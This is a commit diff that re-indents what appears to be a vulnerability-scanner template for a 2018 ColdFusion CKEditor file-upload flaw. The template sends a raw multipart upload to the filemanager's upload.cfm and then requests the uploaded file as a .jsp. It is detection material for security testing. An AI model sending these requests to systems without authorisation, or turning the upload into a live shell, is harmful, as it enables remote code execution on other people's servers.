Linting
parent
90c265672f
commit
03c24bd12d
|
@ -3,26 +3,24 @@ info:
|
|||
author: SkyLark-Lab,ImNightmaree
|
||||
severity: critical
|
||||
tags: server,cve,cve2018,rce,coldfusion,fileupload
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
|
||||
|
||||
-----------------------------24464570528145
|
||||
Content-Disposition: form-data; name="file"; filename="{{randstr}}"
|
||||
Content-Type: image/jpeg
|
||||
|
||||
%%%%%%%%
|
||||
-----------------------------24464570528145
|
||||
Content-Disposition: form-data; name="path"
|
||||
|
||||
{{randstr}}
|
||||
-----------------------------24464570528145--
|
||||
- |
|
||||
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
|
||||
|
||||
-----------------------------24464570528145
|
||||
Content-Disposition: form-data; name="file"; filename="{{randstr}}"
|
||||
Content-Type: image/jpeg
|
||||
|
||||
%%%%%%%%
|
||||
-----------------------------24464570528145
|
||||
Content-Disposition: form-data; name="path"
|
||||
|
||||
{{randstr}}
|
||||
-----------------------------24464570528145--
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp"
|
||||
|
|
Loading…
Reference in New Issue